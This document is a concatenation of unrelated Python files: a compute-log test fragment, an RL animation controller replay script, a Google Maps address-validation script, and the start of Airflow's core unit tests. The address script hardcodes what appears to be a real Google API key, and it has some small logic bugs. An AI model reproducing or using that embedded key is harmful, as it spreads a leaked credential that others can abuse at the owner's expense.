target=execute_inner, args=(step_key, pipeline_run, instance.get_ref())
)
process.start()
process.join()
for step_key in step_keys:
stdout = instance.compute_log_manager.read_logs_file(
pipeline_run.run_id, step_key, ComputeIOType.STDOUT
)
assert normalize_file_content(stdout.data) == expected_inner_output(step_key)
full_out = instance.compute_log_manager.read_logs_file(
pipeline_run.run_id, pipeline_name, ComputeIOType.STDOUT
)
# The way that the multiprocess compute-logging interacts with pytest (which stubs out the
# sys.stdout fileno) makes this difficult to test. The pytest-captured stdout only captures
# the stdout from the outer process, not also the inner process
assert normalize_file_content(full_out.data).startswith(expected_outer_prefix())
|
play_controller.py
|
import argparse
import multiprocessing as mp
import os
current_dir = os.path.dirname(os.path.realpath(__file__))
parent_dir = os.path.dirname(current_dir)
os.sys.path.append(parent_dir)
import gym
import numpy as np
import torch
from common.misc_utils import EpisodeRunner, POSE_CSV_HEADER
FOOT2METER = 0.3048
FOOT2CM = FOOT2METER * 100
env_module = "environments"
def get_model_paths(args):
pwd = os.getcwd()
controller_path = None
pose_vae_path = None
if args.dir is not None:
from glob import glob
base_dir = os.path.join(pwd, args.dir)
candidate_controller_paths = glob(base_dir + "/con*.pt")
candidate_pose_vae_paths = glob(base_dir + "/posevae*.pt")
if len(candidate_controller_paths) == 0 or len(candidate_pose_vae_paths) == 0:
print("Controller or VAE file not found in ", base_dir)
exit(0)
controller_path = candidate_controller_paths[0]
for path in candidate_controller_paths:
if "con_" + args.env in path:
controller_path = path
pose_vae_path = candidate_pose_vae_paths[0]
if args.con is not None:
controller_path = os.path.join(pwd, args.con)
if args.vae is not None:
pose_vae_path = os.path.join(pwd, args.vae)
return controller_path, pose_vae_path
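# For example, running the script with --dir results/exp1 (a hypothetical output directory) picks
# the first con*.pt / posevae*.pt pair found there, preferring a controller file whose name
# contains "con_<env name>"; explicit --con / --vae paths, when given, override the directory scan.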
def visualize_rl_controller_replay(args):
device = "cpu"
controller_path, pose_vae_path = get_model_paths(args)
actor_critic = torch.load(controller_path, map_location=device)
if hasattr(actor_critic, "env_info"):
frame_skip = actor_critic.env_info["frame_skip"]
else:
frame_skip = 1
controller = actor_critic.actor
env = gym.make(
"{}:{}".format(env_module, args.env),
num_parallel=args.num,
device=device,
pose_vae_path=pose_vae_path,
rendered=True,
use_params=args.gui,
camera_tracking=args.track,
frame_skip=frame_skip,
)
print("Loaded:", controller_path)
obs = env.reset()
ep_reward = 0
# overwrite if necessary
if args.frame != -1:
env.reset_initial_frames(args.frame)
with EpisodeRunner(env, save=args.save, max_steps=args.len, csv=args.csv) as runner:
while not runner.done:
with torch.no_grad():
action = controller(obs)
obs, reward, done, info = env.step(action)
ep_reward += reward
if done.any():
print("--- Episode reward: %2.4f" % float(ep_reward[done].mean()))
ep_reward *= (~done).float()
reset_indices = env.parallel_ind_buf.masked_select(done.squeeze())
obs = env.reset(reset_indices)
if info.get("reset"):
print("--- Episode reward: %2.4f" % float(ep_reward.mean()))
ep_reward = 0
obs = env.reset()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"--env",
type=str,
default="TimedTargetEnv-v0",
required=False,
help="Envrionment name",
)
parser.add_argument(
"--con",
type=str,
default=None,
required=False,
help="Path to trained RL controller network file",
)
parser.add_argument(
"--vae",
type=str,
default=None,
required=False,
help="Path to VAE associated with the environment",
)
parser.add_argument(
"--dir",
type=str,
default=None,
help="Directory containing both VAE and controller files",
)
parser.add_argument(
"--num", type=int, default=1, help="Number of characters to simulate"
)
parser.add_argument("--gui", type=int, default=1, help="Show parameters in GUI")
parser.add_argument(
"--track",
type=int,
default=1,
help="1 - camera tracks character | 0 - static camera",
)
parser.add_argument(
"--frame",
type=int,
default=-1,
help="Initial frame for random walk (-1 for random)",
)
parser.add_argument(
"--save",
action="store_true",
default=False,
help="Save video recorded from camera",
)
parser.add_argument(
"--csv",
type=str,
default=None,
required=False,
help="CSV path to dump trajectory",
)
parser.add_argument(
"--len",
type=int,
default=None,
help="Length of video to save in number of frames",
)
args = parser.parse_args()
ps = [
mp.Process(target=visualize_rl_controller_replay, args=(args,)),
]
for p in ps:
p.start()
for p in ps:
p.join()
|
Address_Validator.py
|
#!/usr/bin/python
"""
VALIDATE THE MATCHED ADDRESSES WITH GOOGLE MAPS APIs
IN ORDER TO OBTAIN WHICH ADDRESS IS CORRECT AND
WHICH ONES NEED TO BE CHANGED
"""
import itertools
import json
import os
import re
import sys
import time
import uuid
from difflib import SequenceMatcher
import requests
import threading
business_address_path = "data/output_files/valid_address.json"
shoppingstreet_path = "data/output_files/shoppingstreet.json"
city_path = "data/output_files/city.json"
input_filename = "data/output_files/match.json"
input_filename1 = "data/output_files/cross_streets.json"
validated_streets_path = "data/intern_database/validated_streets.json"
done = False
valids = []
# ------------------ DATA LOADING --------------------------------
# load match.json file
with open(input_filename, 'r') as outfile:
addresses = json.load(outfile)
outfile.close()
# load cross_street.json file
with open(input_filename1, 'r') as outfile:
cross_streets = json.load(outfile)
outfile.close()
# loading valid_address file
if os.stat(validated_streets_path).st_size > 0:
with open(validated_streets_path, 'r') as outfile:
valids = json.load(outfile)
outfile.close()
# ----------------- FUNCTION DEFINITIONS ------------------------
def animate():
"""
animation function for the terminal
"""
for c in itertools.cycle(['|', '/', '-', '\\']):
if done:
break
sys.stdout.write('\rloading ' + c)
sys.stdout.flush()
time.sleep(0.1)
sys.stdout.write('\rDone! ')
def similar(a, b):
"""
:param a: string
:param b: string
:return: ratio of matching
"""
return SequenceMatcher(None, a, b).ratio()
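# For example, similar("Main St", "Main Street") is roughly 0.78: SequenceMatcher.ratio() returns
# 2*M/T, where M is the number of matched characters and T the combined length of both strings.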
def get_street_name(street_id):
"""
:param street_id: String shopping street id to check
:return: street name related, from shoppingstreet.json
"""
street_name = None
with open(shoppingstreet_path, "r+") as shop_check:
shop_check.seek(0, os.SEEK_SET)
shops = json.load(shop_check)
shop_check.close()
for shop in shops:
if shop["street_id"] in street_id:
street_name = shop["name"]
return street_name
def get_city_name(city_id):
"""
:param city_id: String city id to check
:return: city name related, from city.json
"""
city_name = None
with open(city_path, "r+") as city_check:
city_check.seek(0, os.SEEK_SET)
cities = json.load(city_check)
city_check.close()
for citie in cities:
if citie["city_id"] in city_id:
city_name = citie["name"]
return city_name
def index_of(val, in_list):
"""
:param val: String variable to test
:param in_list: list of Strings
    :return: index of val in in_list, or -1 if it is not present
"""
try:
return in_list.index(val)
except ValueError:
return -1
def get_google_results(api_id, address, return_response_fields=None):
"""
    Query the Google Maps Geocoding API or the Places Nearby Search API.
    :param api_id: String naming the API to call, either "geocoding" or "nearbysearch"
    :param address: list of [street_number, street_name, city_name]; the parts are joined into a
        full address such as "18 Starbucks Alexanderplatz, Berlin, Germany"
    :param return_response_fields: None to return the parsed results unchanged, or the name of a
        single field (for example "latitude" or "google_place_id") to project from each result
    :return: list of result dicts from the requested API, or False when Google returns no results
"""
# set up api key
api_key = "AIzaSyDQaVh67imEZW2FLH7hb33SB63jv2shkqQ"
request_url = ""
outputs = []
building = address[0]
address1 = address[0] + " " + address[1] + " " + address[2]
if api_id == "geocoding":
request_url = "https://maps.googleapis.com/maps/api/geocode/json?address={}".format(
address1) + "&key={}".format(
api_key)
print("GEOCODING |||||||||| " + request_url)
if api_id == "nearbysearch":
lat_long = get_google_results("geocoding", address, return_response_fields="latitude")[0][
"latitude"].__str__() + "," + \
get_google_results("geocoding", address, return_response_fields="longitude")[0][
"longitude"].__str__()
request_url = "https://maps.googleapis.com/maps/api/place/nearbysearch/json?location={}".format(
lat_long) + "&rankby=distance&type=establishment&key={}".format(api_key)
print("NEARBYSEARCH |||||||||| " + request_url)
results = requests.get(request_url)
results = results.json()
if len(results['results']) == 0:
return False
else:
for answer in results['results']:
if api_id == "geocoding":
street_number = "0"
for y in answer.get('address_components'):
if 'street_number' in y.get('types'): street_number = y['long_name']
route_name = "0"
for z in answer.get('address_components'):
if 'route' in z.get('types'): route_name = z['long_name']
output = {
"entry": building,
"street_number": street_number,
"route_name": route_name,
"latitude": answer.get('geometry').get('location').get('lat'),
"longitude": answer.get('geometry').get('location').get('lng'),
"google_place_id": answer.get("place_id"),
"type": ",".join(answer.get('types')),
"postcode": ",".join(
[x['long_name'] for x in answer.get('address_components') if 'postal_code' in x.get('types')]),
}
if (output["route_name"]) == "0":
output["route_name"] = answer.get('formatted_address')
if (output["street_number"]) == "0":
pattern = re.compile("^(.+?),")
pattern0 = re.compile(",(.+?),")
patterns = [pattern, pattern0]
for pat in patterns:
if pat.search(answer.get('formatted_address')):
ad = re.findall(pat, answer.get('formatted_address'))[0]
pattern1 = re.compile("\d+")
if pattern1.search(ad):
ad1 = re.findall(pattern1, ad)[0]
if len(ad1) < 4: output["street_number"] = ad1
outputs += [output]
if api_id == "nearbysearch":
street_number = "0"
route_name = answer.get('vicinity')
if answer.get('rating') is None:
rating = 0
else:
rating = int(answer.get('rating'))
output = {'input_string': address1, "street_number": street_number, "route_name": route_name,
"google_place_id": answer.get("place_id"), "type": ",".join(answer.get('types')),
"rating": rating}
pattern = re.compile("^(.+?),")
pattern0 = re.compile(",(.+?),")
patterns = [pattern, pattern0]
for pat in patterns:
if pat.search(route_name):
ad = re.findall(pat, answer.get('vicinity'))[0]
pattern1 = re.compile("\d+")
if pattern1.search(ad):
ad1 = re.findall(pattern1, ad)[0]
if len(ad1) < 4: output["street_number"] = ad1
if output["street_number"] == address[0]:
outputs += [output]
if return_response_fields is None and len(outputs) > 0:
return outputs
elif (len(outputs) > 0) and (return_response_fields is not None):
output_filter = []
for item in outputs:
output_filter += [{"" + return_response_fields: item[return_response_fields]}]
outputs = output_filter
return outputs
else:
return False
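# Usage sketch (with hypothetical street data): a geocoding lookup such as
#   get_google_results("geocoding", ["18", "Alexanderplatz", "Berlin"])
# returns a list of dicts with keys like "street_number", "route_name", "google_place_id",
# "latitude" and "longitude"; passing return_response_fields="latitude" instead projects that
# single field from each result, and False is returned whenever Google finds nothing.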
def get_valid_business(street_number, street_name, city_name):
"""
    Search near the geocoded street address to find related addresses.
    :param street_number: String street number to search
    :param street_name: String street name
    :param city_name: String city name to search
    :return: google_place_id of the highest-rated nearby match, or False
"""
building = [street_number, street_name, city_name]
result = get_google_results("nearbysearch", building, return_response_fields=None)
if result:
result = sorted(result, key=lambda k: k.get('rating', 0), reverse=True)[0]["google_place_id"]
return result
else:
return False
def is_cross_street(street1, street2, city):
"""
    Test whether two streets cross each other.
    :param street1: String first street name
    :param street2: String second street name
:param city: String city name
:return: boolean
"""
if get_google_results("geocoding", [street1, street2, city], return_response_fields=None):
if "intersection" in get_google_results("geocoding", [street1, street2, city], return_response_fields=None)[0][
"type"]:
return True
return False
def similarL1(a, b):
"""
    Test whether string a exactly matches any string in list b.
:param a: String
:param b: List of strings
:return: boolean
"""
if len(b) > 0:
for x in b:
if x == a:
return True
return False
def similarL1a(a, b):
"""
    Test whether any string in list b is a case-insensitive substring of a.
:param a: String
:param b: List of strings
:return: boolean
"""
for x in b:
if x.lower() in a.lower():
return True
return False
def similarL(a, b, ratio):
"""
    Return the first string in list b whose similarity ratio to a exceeds ratio.
    :param a: String
    :param b: List of strings
    :param ratio: float similarity threshold
    :return: the matching string, or False if none exceeds the threshold
"""
for x in b:
if SequenceMatcher(None, a, x).ratio() > ratio:
return x
return False
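# Illustrative examples of the three matching helpers above:
#   similarL1("main st", ["main st", "oak ave"])      -> True   (exact match in the list)
#   similarL1a("123 Main St, Berlin", ["main"])       -> True   (case-insensitive substring)
#   similarL("main strett", ["main street"], 0.7)     -> "main street"  (ratio above 0.7)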
def in_suit(list, entry):
"""
    Test whether the single street number entry falls within the range described by list.
    For example: entry "25" with list "22-27" returns True.
    :param list: String range of street numbers such as "22-27"
    :param entry: String single street number
:return: boolean
"""
text = list.replace("-", "")
if ("-" not in entry) and (entry.isdigit() is True) and (text.isdigit() is True):
list1 = list.split("-")
x = int(list1[0])
suit = set()
suit.add(x)
while x < int(list1[len(list1) - 1]):
x += 1
suit.add(x)
suit.add(int(list1[len(list1) - 1]))
if int(entry) in suit:
return True
else:
return False
return False
def in_suit1(list, entry):
"""
    Test whether the single street number entry falls within the range described by list
    (the same check as in_suit). For example: list "22-27" with entry "25" returns True.
    :param list: String range of street numbers such as "22-27"
    :param entry: String single street number
:return: boolean
"""
text = list.replace("-", "")
if ("-" not in entry) and (entry.isdigit() is True) and (text.isdigit() is True):
list1 = list.split("-")
x = int(list1[0])
suit = set()
suit.add(x)
while x < int(list1[len(list1) - 1]):
x += 1
suit.add(x)
suit.add(int(list1[len(list1) - 1]))
if int(entry) in suit:
return True
else:
return False
return False
def in_suit3(list, list0):
"""
    Test whether two street-number ranges overlap.
    For example: "22-27" and "21-24" share 22, 23 and 24, so this returns True.
    :param list: String range of street numbers such as "22-27"
    :param list0: String range of street numbers such as "21-24"
:return: boolean
"""
text = list.replace("-", "")
text0 = list0.replace("-", "")
if ("-" in list) and ("-" in list0) and (text.isdigit() is True) and (text0.isdigit() is True):
list1 = list.split("-")
x = int(list1[0])
suit = set()
suit.add(x)
while x < int(list1[len(list1) - 1]):
x += 1
suit.add(x)
suit.add(int(list1[len(list1) - 1]))
list2 = list0.split("-")
y = int(list2[0])
suit0 = set()
suit0.add(y)
while y < int(list2[len(list2) - 1]):
y += 1
suit0.add(y)
suit0.add(int(list2[len(list2) - 1]))
temp = [item for item in suit if item in suit0]
if len(temp) > 0: return True
return False
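# Illustrative examples of the street-number range helpers above:
#   in_suit("22-27", "25")     -> True   (25 lies within 22..27)
#   in_suit1("22-27", "25")    -> True   (same check as in_suit)
#   in_suit3("22-27", "21-24") -> True   (the ranges share 22, 23 and 24)
#   in_suit("22-27", "30")     -> False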
# --------------------- MATCH.JSON VALIDATION------------------------------------------
print(
"\n ################################# Matched addresses validation ######################################################")
t = threading.Thread(target=animate)
t.start()
# the valid business addresses found in the source file (valid name and street number)
businesses = []
# the invalid business addresses found in the source file (different number and valid street name)
not_valids = []
# street numbers without business name (extracted from the not_valid object)
incorrects = []
# the corrected street addresses without business name
businesses1 = []
cross_street_count = 0
for shop in addresses:
is_validated = True
for valid in valids:
if shop["street_id"] == valid["street_id"] and valid["Address_Validator"] == False:
is_validated = False
if is_validated == False:
street_name = get_street_name(shop["street_id"])
city_name = get_city_name(shop["city_id"])
business = {"street_id": shop["street_id"], "building": []}
not_valid = {"building": []}
incorrect = {"street_id": shop["street_id"], "city_id": shop["city_id"], "building": []}
business_count = 0
not_valid_count = 0
incorrect_count = 0
cross_street_list = set()
for c in cross_streets:
if c["street_id"] in shop["street_id"]:
for b in c["cross_streets"]:
cross_street_list.add(b["name"])
cross_street_list_count = len(cross_street_list)
for entry in shop["building"]:
if (entry["name"].lower() == "umbau") or (entry["name"].lower() == "neuvermietung"):
incorrect["building"].extend({entry["number"]})
incorrect_count += 1
else:
if get_google_results("geocoding", [entry["name"].lower(), street_name, city_name],
return_response_fields=None):
result = get_google_results("geocoding", [entry["name"].lower(), street_name, city_name],
return_response_fields=None)
for r in result:
if (r["street_number"] is not "0") and (
(similarL1(r["street_number"], entry["number"].split("-"))) or
(r["street_number"] == entry["number"]) or
(similarL1(entry["number"], r["street_number"].split("-"))) or
((in_suit(entry["number"], r["street_number"])) or
(in_suit1(r["street_number"], entry["number"])) or
(in_suit3(r["street_number"], entry["number"])))) and \
((is_cross_street(r["route_name"].lower(), street_name.lower(), city_name.lower())) or \
((street_name.lower() in r["route_name"].lower()) or
(similarL(r["route_name"].lower(), cross_street_list, 0.7)) or (
similarL1a(r["route_name"].lower(), cross_street_list)))):
if is_cross_street(r["route_name"].lower(), street_name.lower(), city_name.lower()) and \
((is_cross_street(r["route_name"].lower(), street_name.lower(),
city_name.lower())) is False) and \
((street_name.lower() not in r["route_name"].lower())):
cross_street_list.add(r["route_name"])
cross_street_count += 1
count_found = 0
for c in cross_streets:
if c["street_id"] in shop["street_id"]:
for x in c["cross_streets"]:
if r["route_name"].lower in x["name"].lower():
count_found += 1
if count_found < 1:
c["cross_streets"].extend([{"cross_street_id": uuid.uuid4().__str__(),
"name": r["route_name"].lower()}])
business["building"].extend({r["google_place_id"]})
business_count += 1
elif (r["street_number"] is not "0") and (
(is_cross_street(r["route_name"].lower(), street_name.lower(), city_name.lower())) or \
((street_name.lower() in r["route_name"].lower()) or
(similarL(r["route_name"].lower(), cross_street_list, 0.7))) or (
similarL1a(r["route_name"].lower(), cross_street_list))):
if is_cross_street(r["route_name"].lower(), street_name.lower(), city_name.lower()) and \
((is_cross_street(r["route_name"].lower(), street_name.lower(),
city_name.lower())) is False) and \
((street_name.lower() not in r["route_name"].lower())):
cross_street_list.add(r["route_name"])
cross_street_count += 1
count_found = 0
for c in cross_streets:
if c["street_id"] in shop["street_id"]:
for x in c["cross_streets"]:
if r["route_name"].lower in x["name"].lower():
count_found += 1
if count_found < 1:
c["cross_streets"].extend([{"cross_street_id": uuid.uuid4().__str__(),
"name": r["route_name"].lower()}])
business["building"].extend({r["google_place_id"]})
business_count += 1
not_valid["building"].extend({entry["number"]})
not_valid_count += 1
incorrect["building"].extend({entry["number"]})
incorrect_count += 1
if business_count > 0: businesses += [business]
if not_valid_count > 0: not_valids += [not_valid]
if incorrect_count > 0: incorrects += [incorrect]
for valid in valids:
if shop["street_id"] == valid["street_id"]:
valid["Address_Validator"] = True
print("\n ---------------------Valid business from the source files--------------------------------------------------")
if len(businesses):
print(json.dumps(businesses, ensure_ascii=False, indent=4))
else:
print("\n No Valid Business Found")
print("\n --------------------------Incorrect Street Numbers--------------------------------------------------------")
if len(incorrects):
print(json.dumps(incorrects, ensure_ascii=False, indent=4))
else:
print("\n No Incorrect Addresses Found")
# ------------------CORRECT MISSING ADDRESS NAMES----------------------------------------------
for inc in incorrects:
street_name = get_street_name(inc["street_id"])
city_name = get_city_name(inc["city_id"])
business1 = {"street_id": inc["street_id"], "building": []}
business1_count = 0
for entry in inc["building"]:
valid_address = get_valid_business(entry, street_name, city_name)
if valid_address:
business1["building"].extend({valid_address})
business1_count += 1
if business1_count > 0: businesses1 += [business1]
if (len(businesses1) > 0):
print(
"\n --------------------------Corrected Businesses fetched--------------------------------------------------------")
print(json.dumps(businesses1, ensure_ascii=False, indent=4))
# regrouping all businesses
for street in businesses:
for street1 in businesses1:
if street1["street_id"] == street["street_id"]:
street["building"] = street["building"] + street1["building"]
################## WRITING IN JSON FILE ######################
# write to Valid_address.json
if os.stat(business_address_path).st_size == 0:
with open(business_address_path, 'a') as outfile:
json.dump(businesses, outfile, ensure_ascii=False, indent=2)
outfile.close()
else:
with open(business_address_path, 'a+') as outfile:
outfile.seek(0, os.SEEK_SET)
businesses1 = businesses
potential_matchjson_d = json.load(outfile)
for street in potential_matchjson_d:
for street1 in businesses:
if street1["street_id"] == street["street_id"]:
street["building"] = street["building"] + street1["building"]
businesses1.remove(street1)
outfile.truncate(0)
if len(businesses1) > 0: potential_matchjson_d.extend(businesses1)
json.dump(potential_matchjson_d, outfile, ensure_ascii=False, indent=2)
outfile.close()
# write in cross streets
if cross_street_count > 0:
if os.stat(input_filename1).st_size == 0 and cross_streets.__len__() > 0:
with open(input_filename1, 'a+') as outfile:
json.dump(cross_streets, outfile, ensure_ascii=False, indent=4)
outfile.close()
else:
with open(input_filename1, 'a+') as outfile:
outfile.seek(0, os.SEEK_SET)
cross_streets1 = cross_streets
matchjson_d = json.load(outfile)
for street in matchjson_d:
for street1 in cross_streets:
if street1["street_id"] == street["street_id"]:
street["cross_streets"] = street1["cross_streets"]
cross_streets1.remove(street1)
if len(cross_streets1) > 0: matchjson_d.extend(cross_streets1)
json.dump(matchjson_d, outfile, ensure_ascii=False, indent=4)
outfile.close()
# write to validated_streets.json
# tracking which street was already validated to ensure a better use of the Google APIs.
if os.stat(validated_streets_path).st_size == 0:
with open(validated_streets_path, 'a+') as outfile:
json.dump(valids, outfile, ensure_ascii=False, indent=4)
outfile.close()
else:
with open(validated_streets_path, 'a+') as outfile:
outfile.seek(0, os.SEEK_SET)
outfile.truncate(0)
json.dump(valids, outfile, ensure_ascii=False, indent=4)
outfile.close()
done = True
|
core.py
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import print_function
import json
import unittest
import bleach
import doctest
import mock
import multiprocessing
import os
import re
import signal
import sqlalchemy
import subprocess
import tempfile
import warnings
from datetime import timedelta
from dateutil.relativedelta import relativedelta
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from freezegun import freeze_time
from numpy.testing import assert_array_almost_equal
from six.moves.urllib.parse import urlencode
from time import sleep
from airflow import configuration
from airflow.executors import SequentialExecutor
from airflow.models import Variable
from airflow import jobs, models, DAG, utils, macros, settings, exceptions
from airflow.models import BaseOperator
from airflow.operators.bash_operator import BashOperator
from airflow.operators.check_operator import CheckOperator, ValueCheckOperator
from airflow.operators.dagrun_operator import TriggerDagRunOperator
from airflow.operators.python_operator import PythonOperator
from airflow.operators.dummy_operator import DummyOperator
from airflow.hooks.base_hook import BaseHook
from airflow.hooks.sqlite_hook import SqliteHook
from airflow.bin import cli
from airflow.www import app as application
from airflow.settings import Session
from airflow.utils import timezone
from airflow.utils.timezone import datetime
from airflow.utils.state import State
from airflow.utils.dates import infer_time_unit, round_time, scale_time_units
from lxml import html
from airflow.exceptions import AirflowException
from airflow.configuration import AirflowConfigException, run_command
from jinja2.sandbox import SecurityError
from jinja2 import UndefinedError
import six
NUM_EXAMPLE_DAGS = 20
DEV_NULL = '/dev/null'
TEST_DAG_FOLDER = os.path.join(
os.path.dirname(os.path.realpath(__file__)), 'dags')
DEFAULT_DATE = datetime(2015, 1, 1)
DEFAULT_DATE_ISO = DEFAULT_DATE.isoformat()
DEFAULT_DATE_DS = DEFAULT_DATE_ISO[:10]
TEST_DAG_ID = 'unit_tests'
try:
import cPickle as pickle
except ImportError:
# Python 3
import pickle
def reset(dag_id=TEST_DAG_ID):
session = Session()
tis = session.query(models.TaskInstance).filter_by(dag_id=dag_id)
tis.delete()
session.commit()
session.close()
configuration.conf.load_test_config()
reset()
class OperatorSubclass(BaseOperator):
"""
An operator to test template substitution
"""
template_fields = ['some_templated_field']
def __init__(self, some_templated_field, *args, **kwargs):
super(OperatorSubclass, self).__init__(*args, **kwargs)
self.some_templated_field = some_templated_field
def execute(*args, **kwargs):
pass
class CoreTest(unittest.TestCase):
default_scheduler_args = {"num_runs": 1}
def setUp(self):
configuration.conf.load_test_config()
self.dagbag = models.DagBag(
dag_folder=DEV_NULL, include_examples=True)
self.args = {'owner': 'airflow', 'start_date': DEFAULT_DATE}
self.dag = DAG(TEST_DAG_ID, default_args=self.args)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
self.run_after_loop = self.dag_bash.get_task('run_after_loop')
self.run_this_last = self.dag_bash.get_task('run_this_last')
def test_schedule_dag_no_previous_runs(self):
"""
Tests scheduling a dag with no previous runs
"""
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_no_previous_runs')
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
datetime(2015, 1, 2, 0, 0),
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
dag.clear()
def test_schedule_dag_fake_scheduled_previous(self):
"""
Test scheduling a dag where there is a prior DagRun
which has the same run_id as the next run should have
"""
delta = timedelta(hours=1)
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_fake_scheduled_previous',
schedule_interval=delta,
start_date=DEFAULT_DATE)
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=DEFAULT_DATE))
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
dag.create_dagrun(run_id=models.DagRun.id_for_date(DEFAULT_DATE),
execution_date=DEFAULT_DATE,
state=State.SUCCESS,
external_trigger=True)
dag_run = scheduler.create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
DEFAULT_DATE + delta,
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
def test_schedule_dag_once(self):
"""
Tests scheduling a dag scheduled for @once - should be scheduled the first time
it is called, and not scheduled the second.
"""
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_once')
dag.schedule_interval = '@once'
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
dag_run2 = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertIsNone(dag_run2)
dag.clear()
def test_fractional_seconds(self):
"""
Tests if fractional seconds are stored in the database
"""
dag = DAG(TEST_DAG_ID + 'test_fractional_seconds')
dag.schedule_interval = '@once'
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
start_date = timezone.utcnow()
run = dag.create_dagrun(
run_id='test_' + start_date.isoformat(),
execution_date=start_date,
start_date=start_date,
state=State.RUNNING,
external_trigger=False
)
run.refresh_from_db()
self.assertEqual(start_date, run.execution_date,
"dag run execution_date loses precision")
self.assertEqual(start_date, run.start_date,
"dag run start_date loses precision ")
def test_schedule_dag_start_end_dates(self):
"""
Tests that an attempt to schedule a task after the Dag's end_date
does not succeed.
"""
delta = timedelta(hours=1)
runs = 3
start_date = DEFAULT_DATE
end_date = start_date + (runs - 1) * delta
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_start_end_dates',
start_date=start_date,
end_date=end_date,
schedule_interval=delta)
dag.add_task(models.BaseOperator(task_id='faketastic',
owner='Also fake'))
# Create and schedule the dag runs
dag_runs = []
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
for i in range(runs):
dag_runs.append(scheduler.create_dag_run(dag))
additional_dag_run = scheduler.create_dag_run(dag)
for dag_run in dag_runs:
self.assertIsNotNone(dag_run)
self.assertIsNone(additional_dag_run)
@freeze_time('2016-01-01')
def test_schedule_dag_no_end_date_up_to_today_only(self):
"""
Tests that a Dag created without an end_date can only be scheduled up
to and including the current datetime.
For example, if today is 2016-01-01 and we are scheduling from a
start_date of 2015-01-01, only jobs up to, but not including
2016-01-01 should be scheduled.
"""
session = settings.Session()
delta = timedelta(days=1)
start_date = DEFAULT_DATE
runs = 365
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_no_end_date_up_to_today_only',
start_date=start_date,
schedule_interval=delta)
dag.add_task(models.BaseOperator(task_id='faketastic',
owner='Also fake'))
dag_runs = []
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
for i in range(runs):
dag_run = scheduler.create_dag_run(dag)
dag_runs.append(dag_run)
# Mark the DagRun as complete
dag_run.state = State.SUCCESS
session.merge(dag_run)
session.commit()
# Attempt to schedule an additional dag run (for 2016-01-01)
additional_dag_run = scheduler.create_dag_run(dag)
for dag_run in dag_runs:
self.assertIsNotNone(dag_run)
self.assertIsNone(additional_dag_run)
def test_confirm_unittest_mod(self):
self.assertTrue(configuration.conf.get('core', 'unit_test_mode'))
def test_pickling(self):
dp = self.dag.pickle()
self.assertEqual(dp.pickle.dag_id, self.dag.dag_id)
def test_rich_comparison_ops(self):
class DAGsubclass(DAG):
pass
dag_eq = DAG(TEST_DAG_ID, default_args=self.args)
dag_diff_load_time = DAG(TEST_DAG_ID, default_args=self.args)
dag_diff_name = DAG(TEST_DAG_ID + '_neq', default_args=self.args)
dag_subclass = DAGsubclass(TEST_DAG_ID, default_args=self.args)
dag_subclass_diff_name = DAGsubclass(
TEST_DAG_ID + '2', default_args=self.args)
for d in [dag_eq, dag_diff_name, dag_subclass, dag_subclass_diff_name]:
d.last_loaded = self.dag.last_loaded
# test identity equality
self.assertEqual(self.dag, self.dag)
# test dag (in)equality based on _comps
self.assertEqual(dag_eq, self.dag)
self.assertNotEqual(dag_diff_name, self.dag)
self.assertNotEqual(dag_diff_load_time, self.dag)
# test dag inequality based on type even if _comps happen to match
self.assertNotEqual(dag_subclass, self.dag)
# a dag should equal an unpickled version of itself
d = pickle.dumps(self.dag)
self.assertEqual(pickle.loads(d), self.dag)
# dags are ordered based on dag_id no matter what the type is
self.assertLess(self.dag, dag_diff_name)
self.assertGreater(self.dag, dag_diff_load_time)
self.assertLess(self.dag, dag_subclass_diff_name)
# greater than should have been created automatically by functools
self.assertGreater(dag_diff_name, self.dag)
# hashes are non-random and match equality
self.assertEqual(hash(self.dag), hash(self.dag))
self.assertEqual(hash(dag_eq), hash(self.dag))
self.assertNotEqual(hash(dag_diff_name), hash(self.dag))
